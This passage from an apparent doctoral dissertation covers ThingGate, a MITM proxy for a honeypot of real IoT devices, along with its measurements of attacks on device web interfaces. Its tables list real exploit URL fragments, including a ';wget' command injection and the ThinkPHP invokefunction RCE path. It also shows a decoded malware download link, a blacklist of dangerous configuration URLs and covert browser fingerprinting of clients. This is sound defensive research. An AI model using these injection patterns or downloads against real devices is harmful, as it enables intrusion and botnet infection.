IoT devices. We build the honeypot by physical IoT devices and develop a proxy to solve the

problems from WebUI of physical IoT devices.

The next phase of research is to analyze the observation results in depth. We proposed a novel

analysis process that utilized machine learning techniques to analyze the attack data collected by

the IoT honeypot consisted of physical IoT devices. The last phase is to develop the

countermeasure against cyber attacks in IoT. According to the pattern and finding from analysis,

we propose IoTProtect, a countermeasure of IoT Botnets and evaluating the approach with IoT

malware in physical IoT devices. Fig. 2 shows the mapping between flow of research and our

methods. By considering the different goals we want to achieve, we introduce these three

approaches in section 3.1, section 3.2, and section 3.3.

15

Fig. 2 Flow of studying cyber attacks in IoT.

3.1. Observation of cyber attacks in IoT

Applying physical IoT devices for building honeypots brings the following challenges:

1. The resource of IoT devices are limited and install additional libraries may modify the

firmware.

2. The reset or recovery process need some manual operation on devices. Many IoT devices

place the reset button on the control panel, and users have to press the button for a while to

trigger the reset function.

3. Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents

devices from working again even with a factory reset. Moreover, some vulnerabilities, such

as CVE-2017-17020, may cause a service shutdown. These types of attack vectors require the

employment of human resource for maintenance [38].

4. For analyzing attack vectors against IoT devices, purchasing all of physical IoT devices to

16

build honeypot is not affordable. We only can utilize a limited number of devices in a

honeypot. If the devices' weakness does not fit the incoming attack vector, the attack fails and

IoT devices cannot capture the further flow or binaries from clients.

5. In SIPHoN [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often

offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect world-wide

cyber attacks against IoT via a few devices deployed locally. However, their research did not

mention if the Wi-Fi Access Point (AP) name may expose location or not. The Wi-Fi AP list

may dynamically show any scanned AP, include a Personal Hotspot from a passerby's mobile

devices. The name of AP in WebUI may consist of personal or organization information lead

to exposing the physical location of honeypot.

To face the challenges from the physical IoT devices, we proposed ThingGate, is a customized

MITM proxy for managing flow between clients and the honeypot that consists of real IoT devices.

ThingGate achieves the following functionalities:

1. Incoming traffic management

We wish to block the incoming flow of unwanted or deadly attack vectors.

2. Extending functions of web tracking

Our proxy injects fingerprinting JavaScript codes through a MITM to track user clients.

3. Response information management

Our program checks the HTTP response from IoT devices and prevents the leakage or exposure

of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly.

We hope to prevent leakage through a light-weight and straightforward method.

4. Real-time analysis of misplaced cyber attack

IoT malware employs various vulnerabilities from WebUI of devices and injects OS command

in the URL. However, some malware didn't check targeted devices before they send malicious

17

HTTP requests. For the misplaced command injection URL (CI-URL) which attack target is

not in our physical IoT devices, we can conduct real-time analysis and download tasks.

3.2. Analysis of cyber attacks in IoT

IoT honeypot has successfully observed Botnets targeting IoT devices over Telnet and HTTP

protocols. The observation brought massive data of malware binaries and attack vector logs.

Besides, IoT malware continues to evolve, and the diversity of OS and environments increases

the difficulty of executing malware samples in dynamic analysis. To address these problems, we

want to develop an alternative means of the investigation by using the attack vectors and analyzing

malware without executing it. Moreover, we summary the attack vectors to create an in-depth

view of cyber attacks in IoT.

The primary attack vectors come from cyber attacks in IoT are through Telnet protocol (75%)

[8]. Thus we focus on analyzing the Telnet logs and malware binaries. The dataset come from the

honeypot consisted of physical IoT devices. To compress the data, we develop an encoding

method for mapping Telnet logs to simplified character sequences.

Further, studying and evaluating the best distance algorithm for distinguishing these sequences

according to the malware families. As a result, we extract key patterns of different interaction

behavior using an N-gram model. We employ both unsupervised or supervised learning

algorithms and text-mining algorithms for handling unstructured data. For unsupervised learning

algorithms, because the cyber attacks in IoT keep evolving, and the pattern of attacks is uncertain.

Therefore, we choose the hierarchical clustering method because it does not require to predefine

the number of clusters.

For supervised learning algorithms, we propose a malware classification method based on

malware binaries, command sequences, and meta-features. Our approach trains a multiclass

classifier to identify IoT malware categories based on common infection behavior. For

18

misclassified subclasses, second-stage sub-training is performed using a file meta-feature. Finally,

we used a confusion matrix and accuracy to measure the classification result.

3.3. Countermeasure of cyber attacks in IoT

Form the attack campaign of IoT Botnets, mostly the attacker will upload malware binaries to

a writable folder of victim devices. Besides, the filesystem and storage of low-cost IoT devices

are limited, and most files are read-only or generated by Linux kernel on-the-fly. Therefore, the

length of whitelists is only a few thousand. Based on these features, we proposed IoTProtect, is a

whitelisting method for protecting low-cost IoT devices. IoTProtect consists of three whitelists

and a checker program. The pathname whitelist is a list of pathnames of all legitimate executables.

The hash value whitelist records MD5 hash values of binaries on IoT devices. The comparison

and whitelist of cmdline content are optional and performed only if there are processes that cannot

display their pathname and exe links in the "proc" filesystem.

For the creation of whitelists, we assume that the device to be protected has already been

developed and that the device developer is to install IoTProtect on top of the existing system. We

skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O files. If

developers know precisely which executable files to include on the whitelist, they can create their

whitelist manually. However, recent IoT device products are often not developed by a single

manufacturer, and each developer does not know all of the legitimate executables exactly. In such

a case, developers can still create whitelists that include all executables existing in the system by

using the Linux command "find" with the "-exec" expression and "md5sum." Moreover, the

cmdline whitelist can be created by "find" with the "-exec" expression and "cat" Linux commands.

IoTProtect first filters processes that are not included in the pathname whitelist and then filters

the remaining processes according to the hash value whitelist. It then filters the remainder with

the cmdline whitelists if there are any processes with no pathname and exe links. Finally, it

19

removes all remaining processes.

In the dissertation, we conducted experiments with four actual IoT devices and 4,981 malware

binaries captured by our IoT honeypot for evaluation. We show four different experiments to

evaluate the effectiveness, overhead, and easy deployment of IoTProtect.

20

Chapter 4.

ThingGate: A gateway for flexible operation of bare-metal IoT

honeypot

4.1. Introduction

In recent years, people have been connecting various things to the Internet for monitoring,

collecting data, or remote manipulation. Backend applications collect and exchange data with

these devices through the network. This network of this appearance is called the Internet of things

(IoT). However, an IoT Malware “Mirai” was used for conducting the massive Distributed Denial

of Service (DDOS) attack against Dyn DNS In October of 2016. There were about 100,000 Mirai

IoT Botnet nodes were enlisted in this incident and reported attack rates were up to 1.2 Tbps [2].

Therefore, cyber threats from IoT Botnet have become a reality. To observe cyber attacks against

such devices and analyze the threats from IoT malware, some researchers design new observation

mechanisms and build various honeypots. These honeypots include, for example, IoTPOT [4],

SIPHON [5], IoTCandyJar [6], and real devices honeypot for observing Web UI of IoT devices

[7].

The competition between hackers and cybersecurity researchers is an endless war. IoT malware

keeps evolving and exploits multiple vulnerabilities to infect IoT devices. Since May 2018, the

Mirai and Bashlite malware families that assimilate multiple known exploits affecting the Internet

of Things (IoT) devices. These exploits come from 11 makers' devices over HTTP, UPnP, Telnet,

and SOAP protocols [3]. Besides their well-known activities such as DDoS, recent IoT malware

have diverse purposes including coin mining, click fraud, and sending spam emails. Nonetheless,

human attackers also utilize various tools to access and collect variable information on the device.

For examples, WebUI of many IP Cameras and routers are constantly searched and accessed if

21

vulnerable. In order to observe and analyze such a variety of attacks in depth, there is an increasing

need for a bare-metal IoT honeypot, namely a real IoT device, as a honeypot. Cause it is costly to

emulate device-specific vulnerabilities and complicated functionalities provided through their

WebUI and other dedicated services, such as UPnP.

However, it is worth noting that operating bare-metal IoT honeypots has unique technical

challenges mostly coming from their low configurability as an embedded system. For example,

honeypot operators may need to control the incoming traffic since there are critical attacks that

may destroy firmware and/or change the network configuration of devices that could disconnect

the honeypot devices. Also, honeypot operators may need to mask and/or replace outgoing

responses from the honeypot devices as they may contain information such as surrounding

wireless access points, which could reveal the physical location of the honeypot devices.

4.2. Definitions

4.2.1. Man-in-the-middle

The man-in-the-middle (MITM) refers to an attack in which the attacker positions themselves

between two communicating parties and secretly relays or alters the communication between

these parties, who believe that they are engaging in direct communication with each other.

Messages intended for the legitimate site are passed to the attacker instead, who saves valuable

information, passes the messages to the legitimate site, and forwards the responses back to the

user. The MITM way can lead to the web proxy attack, in which a malicious web proxy receives

all web traffic from a compromised computer and relays it to a legitimate site. The proxy collects

credentials and other confidential information from the traffic. MITM flows are difficult to detect

because a legitimate site can appear to be functioning properly and the user may not be aware that

something is wrong [39]. We utilize a web proxy attack to monitor and manage the flow between

clients and our honeypot.

22

4.2.2. Transparent Proxy

In computer networks, a proxy server is a server that acts as an intermediary for requests from

clients seeking resources from other servers [40]. A proxy server can fulfill the request from the

client, filter out, or modify the request in a specific way. Transparent Proxying or a transparent

proxy means we redirect traffic into a proxy at the network layer, without any client configuration

[9]. The client is unaware that the response received originates from the proxy server and not from

the source server. We conduct the flow forwarding through MITM proxy by pf of FreeBSD [41]

and socat [42].

4.2.3. Browser fingerprinting

Browser fingerprinting involves making a recognizable subset of users unique. The fingerprint

is primarily used as a global identifier for those users. Furthermore, we can utilize a global

identifier to create a web tracking mechanism for user browsers [43]. In 2012, Mowery and

Shacham presented canvas fingerprinting, which is a web fingerprinting algorithm [44]. They

demonstrated that the new HTML5 feature could be used to generate a relatively unique

fingerprint that could be used to track users. Canvas fingerprinting uses the browser’s Canvas API

to draw invisible images and extract a persistent, long-term fingerprint without the user’s

knowledge [45]. Tracking mechanisms have advanced such that these mechanisms are difficult to

control and detect and are resilient to blocking or removing. Another feature of canvas

fingerprinting is that the resulting fingerprint may differ from one browser to another on the same

machine [46]. In this study, we use fingerprintjs2 [47], which is an open-source library of canvas

fingerprinting, to achieve the web tracking function.

4.2.4. Cyber attacks against WebUI of Physical IoT Devices

In 2017, Ezawa et al.[7] proposed a honeypot consisting of physical IoT devices to observe

attacks against the WebUI of IoT devices. The devices include IP Cameras, routers, pocket routers,

23

a printer, and a TV receiver. In 2018, Tamiya et al. [17] employed five IP Cameras to build a

decoy honeypot to capture the behavior of peeping attackers. According to these two honeypots,

we summarized four kinds of cyber attacks against these WebUI:

1. Configuration information theft attacks

If the device contains vulnerabilities of information disclosure or weak credentials. The

attacker can collect the configuration and parameters of devices by some URLs, such as

get_status.cgi.

2. Modification of the configuration

According to the observation of the two honeypots, attackers may modify the DDNS, VPN,

credentials, and network configuration.

3. Snapshot attacks

Snapshot is a feature of IP Cameras and offers a current time image of the live stream to users.

Once the clients send the HTTP request of the snapshot, the web server will provide the

current time image in a JPG or PNG file.

4. Long term peeping

This attack collected by IP Cameras when some clients access the URL of the live stream.

Moreover, the clients stay on the web page of live streams for several hours.

4.3. ThingGate

4.3.1. System goal

The use of conventional IoT devices for building new honeypots raises the following

challenges:

1. Poor expandability

The resource of IoT devices are limited and install additional libraries may modify the firmware.

2. Inconvenient reset or restore mechanism

The reset or recovery process need some manual operation on devices. Many devices place the

reset button on the control panel, and users have to press the button for a while to trigger the

reset function.

3. Threat of service segmentation fault attacks or brickering command

24

Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents devices

from working again even with a factory reset. Moreover, some vulnerabilities, such as CVE-

2017-17020, may cause a service shutdown. These types of attack vectors require the

employment of human resource for maintenance [38].

4. Misplaced cyber attacks in IoT flow

For analyzing attack vectors against IoT devices, purchasing all of physical IoT devices to build

honeypot is not affordable. We only can utilize a limited number of devices in a honeypot. If

the devices' weakness does not fit the incoming attack vector, the attack fails and devices cannot

capture the further flow or binaries from clients

5. Exposure risk from the sensor information

In SIPHoN [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often

offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect world-wide

cyber attacks against IoT via a few devices deployed locally. However, their research did not

mention if the Wi-Fi Access Point (AP) name may expose location or not. The Wi-Fi AP list

may dynamically show any scanned AP, include a Personal Hotspot from a passerby's mobile

devices. The name of AP in WebUI may include personal or organization information lead to

exposing the physical location of honeypot.

ThingGate is a customized MITM proxy for managing flow between clients and the honeypot

that consists of physical IoT devices. To face the challenges from the honeypot of physical IoT

devices, we define the following goals.

1. Incoming traffic management

We wish to block the incoming flow of unwanted or deadly attack vectors.

2. Extending functions of web tracking

Our proxy injects fingerprinting JavaScript codes through a MITM to track user clients.

25

3. Response information management

Our program checks the HTTP response from IoT devices and prevents the leakage or exposure

of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly.

We hope to prevent leakage through a simple and light-weight method.

4. Real-time analysis of misplaced cyber attack

IoT malware employs various vulnerabilities from WebUI of devices, and injects OS command

in the URL. However, some malware didn’t check targeted devices before they send malicious

HTTP requests. For the misplaced command injection URL (CI-URL) which attack target is

not in our physical IoT devices, we can conduct real-time analysis and download tasks.

4.3.2. System Overview

Our design, which was inspired by SIPHON architecture [5], is displayed in Fig. 3. Our

honeypot consists solely of physical IoT devices. Moreover, SIPHON’s forwarder is improved

with an MITM proxy to manage the forward traffic from wormholes to local physical IoT devices.

We design a module to analyze some CI-URLs. These flows may target IoT devices other than

ours.

Fig. 3 System overview of ThingGate

26

Wormhole. The wormhole device contains some ports open to the general Internet on a public IP

address. We transparently forward the incoming traffic toward these ports through an MITM

proxy to a specific port on a remote physical IoT device. Forwarding is conducted through socat

[42], which is a command-line-based utility that establishes two bidirectional byte streams.

CI-URL Analysis and Downloader (CAD). If the flow contains features of CI-URLs, then we

redirect the HTTP request to CAD. CAD provides 200 response codes to the client and analyzes

the CI-URL. If CAD successfully extracts download links from the flow, real-time download

tasks of links can be conducted.

MITM Proxy. The socat utility ensures that the traffic between the wormhole and the IoT device

has managed to accomplish the protection and HTTP response rewriting tasks in real time. The

proxy examines all the flows and decides to block, delegate to devices, or redirect the flow to the

CI-URL analysis and downloader (CAD). The proxy conducts the modification of the flow

through the MITM way.

IoT Devices. IoT devices are typical commercial off-the-shelf devices that contain vulnerabilities.

In this system, we focus on cyber attacks against the WebUI of IoT devices. Thus, we only forward

incoming HTTP flow to its HTTP service ports.

Data Storage. The storage dumps traffic records from the wormholes and aggregates the data for

offline analysis. For example, Wireshark is used to analyze the headers of HTTP requests in

dumped traffic files.

4.3.3. System Architecture and Modules

The system architecture of the ThingGate system is displayed in Fig. 4. The MITM proxy

transparently manages the input and output flow of the honeypot constructed with physical IoT

devices in real time. IoT devices answer the flow delegated by the proxy and send the HTTP

27

response back to the client through the MITM proxy. Moreover, the proxy redirects specific HTTP

requests that contain CI-URLs to the CAD. Then CAD extracts links and downloads malware

binaries. Moreover, our proxy injects fingerprinting JavaScript codes into the HTTP response

content and replaces sensitive information with fabricated material.

Fig. 4 System Architecture of ThingGate

The details of the modules are as follows:

Request Controller. The request controller is in charge of incoming HTTP requests. The request

controller reviews every request and determines whether the flow should be directly forwarded to

IoT devices. The process of URL checking is illustrated in Fig. 5. First, we examine whether the

URLs utilize the dangerous vulnerability of our IoT devices. For example, D-Link’s IP Camera,

DCS-5020L, contains vulnerabilities in its WebUI. If attackers post a long string value to the URL

“/setSystemNetwork” in the form parameters, then the HTTP request causes the web service to

crash [48]. Therefore, the request controller replaces the URL with another valid URL. Second,

28

according to Ezawa’s study, some attackers change the DDNS, VPN, or network settings of IoT

devices [7] to prevent other clients from accessing the device. These attacks may incur the

necessity of performing manual tasks such as rebooting or resetting devices. Therefore, we must

protect these critical configurations. The request controller compares the URLs of the incoming

request, filters out the requests that cause unwanted configuration changes, and replaces these

URLs with other valid URLs of the WebUI. Third, our program verifies the operating system

(OS) commands and different URLs embedded in the URL. The request controller redirects these

CI-URLs to the CAD. Finally, the request controller forwards the remaining HTTP requests to

IoT devices.

Fig. 5 The processing flow of Request controller

Response controller. The response controller is in charge of the HTTP responses from IoT

29

devices. Three conditions trigger action by the response controller.

1. The HTTP response from IoT devices contains a body tag.

The response controller injects fingerprinting JavaScript codes into the body tag. The

JavaScript library creates a hash fingerprint if the client can support the JavaScript code.

2. The HTTP response includes sensitive information

In this method, we focus on the Wi-Fi AP list. The name of the Wi-Fi AP may consist of a

username or information concerning the organization or location. The response controller

replaces all APs with fabricated AP information.

CI-URL Analyzer. is responsible for the two analysis of extracting download links from the CI-

URLs and downloaded scripts. The CI-URL analyzer includes two components, namely the URL

parser and script parser. The URL parser decodes the CI-URLs and transforms them into OS

commands (Fig. 6). The CI-URL in Fig. 6 utilizes the vulnerability of the D-Link router DSL-

2750B [49]. The URL parser decodes the CI-URL and extracts the link from the OS commands,

"http://yyy.yyy.173.159/d." The CI-URL analyzer also passes the link to the downloader.

Fig. 6 The encoded URL of CI-URL and decoded results

If we successfully download the file and the file is a shell script file (e.g., the script displayed

in Fig. 7), then the script parser analyzes the content, traverses all parameters, and extracts the

links of malware. Finally, the script parser passes the links of malware to the downloader.

30

Fig. 7 Downloaded Scripts from CI-URL

Downloader is responsible for download malware binaries tasks. We found the header

parameters' value in HTTP requests conducted by IoT devices may be distinguished from

Unix/Linux server operating system. For example, the user-agent value conducted by macOS

Mojave 10.14.2's wget command is "Wget/1.13.4 (darwin13.1.0)". The "darwin13.1.0." is a

library name of macOS packages [50]. In contrast to the user-agent value produced by macOS,

that produced by the router A in Table 1 is “Wget./1.16 (linux-gnu)." Therefore, the user-agent in

HTTP header may expose the information of the download client. Therefore, we customized our

header values appear as similar as possible to IoT devices.

4.4. Evaluation

4.4.1. Prototype and dataset

We developed a prototype of ThingGate using Python and the MITM proxy open-source

software [51]. We performed four different experiments with seven physical IoT devices to

evaluate the effectiveness of ThingGate. Table 1 presents the specification of our devices, all of

which contained vulnerabilities that had been publicly disclosed. Besides, we installed ThingGate

on a server with four cores Intel 3.10 GHz CPU, 16 GB RAM, and 1.8 Terabytes disk.

31

Table 1 IoT devices used in experiments.

IoT device Maker’s country

CPU Arch. Appr. price* (JPY)

Router A Taiwan MIPS 26,000

IP Camera A1 China ARM 4,980

IP Camera A2 China ARM 4,980 IP Camera A3 China ARM 4,980

IP Camera B USA ARM 3,000

IP Camera C Taiwan MIPS 14,000

IP Camera D Taiwan MIPS 7,960

* We collected this price information from Amazon Japan on Oct. 1, 2018. IP Camera A1 ~A3 are the

same mode devices

Table 2 presents the two datasets collected by our honeypot through ThingGate. From September

8 to October 13, 2018, we used five devices and 19 IP addresses to collect the attack flow (dataset

1). Moreover, we analyzed the URL list of critical configurations and the URLs of deadly

vulnerabilities from our IoT devices. We designed and implemented the prototype of ThingGate

according to dataset 1. From November 17, 2018, to June 31, 2019, we deployed ThingGate and

forwarded 19 IP addresses to conduct the evaluation experiments. The collected flow for this

period is labeled as dataset 2.

Table 2 Data set for analysis.

Data set Number of

HTTP

requests

Number of

honeypot

IP

Time interval Analysis subjects

1 307,405 19 2018/09/08~

2018/10/13 Blocking list, CI-URL, and CAD

2 1,920,653 19 2018/11/17~

2019/06/30

Blocking unwanted flow,

Web tracking,

Handle misplaced attack,

Fabricated sensor content

32

Table 3 shows the distribution of HTTP methods in dataset2. The GET and POST accounted

for the vast majority (97 %) which contain various cyber attacks against HTTP services. Moreover,

some of the OPTION method flows come from the Real Time Streaming Protocol (RTSP) [52].

The RTSP traffic means some attackers or malware recognized our devices are IP Cameras and

want to utilize our RTSP services. Besides, the M-SEARCH and NOTIFY traffic are based on

Universal Plug and Play protocol (UPnP) [53]. Our devices disabled the UPnP port and services

by default, but the clients try to attack our UPnP service. For the PROFIND flows, the clients

blindly sent remote buffer overflow packets which against IIS 6.0 [54].

Table 3 HTTP method statistics for dataset 2.

HTTP method count Percentage

(100%)

CONNECT 420 0.022

GET 1,512,526 78.751

HEAD 7,062 0.368

M-SEARCH 41,961 2.185

NOTIFY 67 0.003

OPTIONS 264 0.013

POST 356,272 18.550

PROPFIND 1,938 0.101

PUT 132 0.006

Table 4 presents the statistics of HTTP requests, attackers' IP address and URLs. Because we

forward fifteen IP address for IP Camera A1, A2, and A3, they got the most HTTP requests.

However, IP Camera C got the most HTTP requests and clients' IP on condition that forwarding

only one IP traffic to each device.

33

Table 4 Statistics of cyber attacks. Observation of 7 months..

IoT device Honeypot

IP counts

HTTP request

counts

Unique attacker

IP counts

Unique URL

counts

Router A 1 17,447 1,808 6,150

IP Camera A1 5 340,316 22,336 2,300

IP Camera A2 5 455,639 23,196 4,546

IP Camera A3 5 193,941 13,642 1,573

IP Camera B 1 54,024 4,581 1,740

IP Camera C 1 782,645 4,291 2,8111

IP Camera D 1 76,641 4,422 1,395

Total 19 1,920,653 57,230 38,374

4.4.2. Cyber attacks against the WebUI of physical IoT devices

According to dataset 2, there are 1,920,653 cyber attacks employed HTTP requests to attack

our honeypot. Some of these attacks are only able to be observed by physical devices. We

collected similar attacks which present in Ezawa's and Tamiya's honeypot [7][17]. We found

attackers attempt to capture and modify the configuration of devices, remotely control direction

and zoom of IP Camera, peep the live video, snapshot of IP Camera and utilized the remote code

execution (RCE) vulnerability of devices [55]. In addition, after the RCE attack vector, the

attacker download devices' live stream by access a hidden web application. The application

"/video.cgi"did not appear in source code and can be customized by width and height parameters.

Table 5 shows the statistic and description of the attack against our physical device.

There were 49 source IPs has watched the live stream of the camera. Among them, five IPs

were peeking over an hour. The maximum time of peeking is about 18 hours. Moreover, some

clients from 21 source IP addresses adjusted the directional and zoom of the camera. One client

from American applied the RCE exploit code of IP Camera C to attack IP Camera C and D. The

34

Live stream for long term peeping, the real-time response of control direction and zoom, and the

whole scenario of RCE attack are hard to simulate by VM-based honeypot. Our physical devices

behind ThingGate successfully observed these kinds of cyber attacks.

Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP Camera A1~A3,

B, C, and D.

Category Pathname Description of URL Victim devices Request

counts

Configuration

information

theft attacks

get_params.cgi Show system variables IP Camera

A1~A3, B 599

get_status.cgi Show configuration of

devices

IP Camera

A1~A3, B, C, D 1064

modification of

the

configuration

/%5ccgi-

bin/set_network.cgi Set network configuration

IP Camera A3 83

decoder_control.cgi Control directional and

zoom

IP Camera

A1~A3 153

Snapshot

attacks snapshot.cgi

Show current image of live

video stream

IP Camera

A1~A3, B 2,920

Long term

peeping

livestream.cgi Show live video stream IP Camera

A1~A3, 4560

videostream.cgi Show live video stream IP Camera

A1~A3, B 273

Remote

Command

Execution

/setSystemCommand Set OS Commands for

execution

IP Camera C, D

4

4.4.3. Blocking unwanted flow experiments

4.4.3.1. Design of experiment

We analyzed our devices and created a list of configuration URLs and dangerous vulnerabilities.

35

There are 51 critical configuration URLs and one dangerous URL in the list, and we extract the

pathname of configuration URLs to build a blacklist. Further, we select target pages in devices

for replacing the pathname in the blacklist. Table 6 presents the blacklist against IP Camera

A1~A3. Moreover, we deployed the blacklist in ThingGate and redirected flow to the target pages

if the incoming traffic matched the blacklist. The flow of one IP address was forwarded to all

devices except for the three IP Cameras.

Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3.

Configuration pathname

Description of pathname

Replaced pathname

Description of pathname

/set_network.cgi change network settings

/admin2.htm show camera status

/reboot.cgi reboot camera /admin2.htm show camera status

/set_upnp.cgi change UPnP settings

/upnp.htm show UPnP information

/set_wifi.cgi set Wi-Fi network /wireless.htm show Wi-Fi settings

/set_ddns.cgi change dynamic DNS settings

/ddns.htm show dynamic DNS settings

/set_users.cgi change user settings /user.htm show user account settings

/restore_factory.cgi restore factory settings

/upgrade.htm show upgrade functions

/upgrade_htmls.cgi, upgrade system firmware

/upgrade.htm show upgrade functions

/upgrade_htmls.cgi upgrade WebUI /upgrade.htm show upgrade functions

4.4.3.2. Experimental results

From dataset 2, we found on June 7th, an attacker from American accessed our Wi-Fi router in

the honeypot and modified the LAN DNS setting, point to a Vietnam server. ThingGate

successfully blocked the HTTP request, filtered out the form data, and replace the URL with

another URL in WebUI. Fig. 8 shows the detail information of the HTTP request.

36

Fig. 8 The HTTP request of a modifying configuration attack.

4.4.4. Web tracking experiments

4.4.4.1. Design of experiment

We conducted this experiment on all devices in our honeypot. As illustrated in Fig. 9,

ThingGate examined the HTTP response content from all of the devices. If the response code

equals 200 and the HTML contains the body tag, then the proxy injects fingerprinting JavaScript

codes in response. If the client can render our JavaScript codes, then the client generates a canvas

fingerprint and sends it back to ThingGate.

37

Fig. 9 Web Tracking flow of ThingGate

4.4.4.2. Experimental results

From dataset 2, we found that clients from 18 different source IPs successfully sent their

fingerprint values to ThingGate. We collected 26 different fingerprint values from these clients.

The geographic information on the IPs of the fingerprinted clients is displayed in Fig. 10. Of these

clients, seven were from Japan and six were from the United States. In total, 72% of the clients

were from these two countries. Four clients provided only one fingerprint value, whereas the other

14 clients provided two or more fingerprint values. Moreover, we discovered that one of the four

single-fingerprinted clients was Googlebot [56]. We verified Googlebot by using a reverse DNS

lookup on the accessed IP address according to a Google document [57] (Fig. 11). Googlebot

attempts to access the IP Camera C and sends requests against 18 different URLs of the WebUI.

These URLs contain the snapshot, parameters of the camera, DDNS, and Wi-Fi setting pages.

Googlebot successfully collected the configuration information of the devices, including our

fabricated Wi-Fi AP list.

38

Fig. 10 Country distribution of fingerprinted clients

Fig. 11 Googlebot’s user-agent and the verifying result

Among the fingerprinted clients, three US clients sent the same two fingerprint values back to

ThingGate. Table 7 presents the attack features of the three clients. They almost traversed the

forwarding IP of the honeypot. Moreover, more than 27% of HTTP requests were utilized in the

HEAD method to attack our devices, and 83% of the URLs between the three clients were

common among them. The identical features and fingerprint values implied that the three clients

belonged to the same attacker.

39

Table 7 Features of the fingerprinted clients.

Source

IP address

Victim

devices

Unique

URL

count

HEAD

URLs

count

Common

URLs with

1st IP

Attack Duration

xxx.xxx.226.109 IP Camera

A1~A3, B, C,

and D

128 44 N/A 2018/12/05~

2019/01/11

xxx.xxx.32.101 IP Camera

A1~A3, B, C,

and D

74 23 62 2018/12/14~

2019/01/23

xxx.xxx.30.101 IP Camera

A1~A3, B, C,

and D

33 9 32 2018/12/28~

2019/01/11

4.4.5. Managing misplaced attacks experiments 4.4.5.1. Design of experiment

ThingGate examines all of the incoming flow against 19 IP addresses. If any different site with

OS commands is embedded in the URL, our program redirects the flow to CAD through an MITM

way. Next, the CI-URL analyzer analyzes the URLs and downloaded scripts. The downloader

handles all downloading tasks if our parsers extract any link during the analysis.

4.4.5.2. Experimental results

The attack flow of dataset 2 revealed that ThingGate successful redirected the HTTP requests

of 411 CI-URLs to CAD. These CI-URLs contained 50 different URLs that exploited seven

vulnerabilities. Fig. 12 depicts the vulnerability distribution of the URLs. A total of 76% of the

CI-URLs used the top two vulnerabilities from products of D-Link and ThinkPHP. The usage of

these two vulnerabilities was three times that of other vulnerabilities. Table 8 presents information

on the seven vulnerabilities, including the maker, model, version, and path of the WebUI.

40

Fig. 12 Vulnerability distribution of CI-URL

Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B, C, and D.

Maker CVE/Exploit DB Type model/

version

URL pattern of vulnerability

D-Link

OS Command

Injection

(Metasploit) [49]

Router DSL-

2750B

/login.cgi?cli=aa%20aa%27;wget%2

0

ThinkPHP Remote Code

Execution [58]

Web app

framework V5.X

/index.php?s=/index/¥think¥app/invok

efunction&function

AVTECH 2015-2280 [59] Camera/N

VR/DVR

all

version

/cgibin/nobody/Search.cgi?action=cgi

_query&ip=google.com&

port=80&queryb64str=Lw==&userna

me=admin%20;XmlAp%20r%20

Account.User1.Password%3E$

AirLink 2015-2280 [60] Camera SkyIPCa

m1620W

/maker/snwrite.cgi?mac=1234&

Fastweb 2018-11336 [61] Modem V0.0067

/status.cgi_=1526904600131&cmd=3

&nvget=login_confirm

&password

41

MikroTik 2018-14847 [62] RouterOS Before

V6.38.4

/jsproxy?

TUTOS

'cmd.php' Remote

Command

Execution [63]

Software V1.3

/tutos/php/admin/cmd.php?cmd=

From the 411 CI-URLs, the CAD successful downloaded 150 different malware binaries and

23 scripts. Therefore, we searched for an optimal solution for labeling these malware binaries.

VirusTotal [64] was the platform used to obtain scan results from 66 antivirus engines. We sent

12,821 unique malware MD5s from IoTPOT in 2017 and selected the most common malware

family name as the representative malware category from the VirusTotal reports. We also

discovered that Kaspersky, DrWeb, and ESET-NOD32 are the top three antivirus engines because

of their high detection ratio and consistency. We conducted a local scan of 40,203 different IoT

malware binaries and found that DrWeb could label 39,245 of them, which comprises 97.61% of

the submitted malware. The labeling performance of DrWeb surpassed that of both Kaspersky

(69.82%) and ESET-NOD32 (74.57%). Therefore, we employed DrWeb to label the IoT malware

collected by the CAD in dataset 2.

DrWeb successfully marked 148 binaries. Fig. 13 illustrates the statistics of malware labels.

Mirai malware accounts for the vast majority of binary files (92%). We discovered that 18 Mirai

binaries employed ThinkPHP’s vulnerability to infect victim sites. Moreover, the BTCMine

malware (one binary) is a mining trojan. The attacker of the BTCMine malware also utilized the

vulnerability of ThinkPHP to attack our honeypot.

42

Fig. 13 Statistic of malware labels

4.4.6. Fabricated sensor information experiment

4.4.6.1. Design of experiment

We selected the WebUI of all of the IP Cameras as victim devices that we would like to protect.

ThingGate monitored the flow of 18 IPs forwarded to these cameras. If clients requested the web

page of scanning Wi-Fi information, we replaced the information with fabricated information. Fig.

14 depicts the webpages before and after modification with ThingGate.

43

Fig. 14 Fabricated Wi-Fi AP list

4.4.6.2. Experimental results

In dataset 2, we found that ThingGate successful sent fabricated Wi-Fi information to 44

different clients in 80 HTTP response. Table 9 presents part of the attackers’ geographical location,

number of requests sent, and duration of visit to our honeypot. The Googlebot client only sent 23

HTTP requests in one day.

Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP Camera

A1~A3, B, C, and D.

clients Source IP Country Requests

for

Wi-Fi

Total

request

count

Attack Duration

Client A aaa.aaa.202.28 USA 3 2704 2018/12/12~2018/

12/12

Client B bbb.bbb.169.38 USA 3 4167 2018/12/23~2018/

12/23

Client C ccc.ccc.226.5 USA 6 3476 2018/12/17~2019/

44

01/12

Client D ddd.ddd.89.58 China 1 537 2019/01/11~2019/

01/11

Client E eee.eee.148.116 China 3 2333 2018/11/19~2018/

11/19

Client F fff.fff.15.51 France 3 98 2019/01/07~2019/

01/08

Client G ggg.249.79.85* USA 1 23 2018/11/17~2018/

11/17

*The client G is Googlebot

4.4.7. Stress testing against IoT devices

4.4.7.1. Design of experiment

According to dataset 2, there is about 0.33 HTTP request towards one device per minute on

average. We take a ceiling of 0.33 that got one HTTP request per minute. Therefore, we assume

up to five users may watch the live stream of IP Cameras concurrently. Our testing employs five

Chrome browsers (v72.0.3626.121) on five computers to login IP Cameras and to view the pages

contain live streams. We both conduct the testing through ThingGate or access WebUI directly.

Also, examining each condition for ten times.

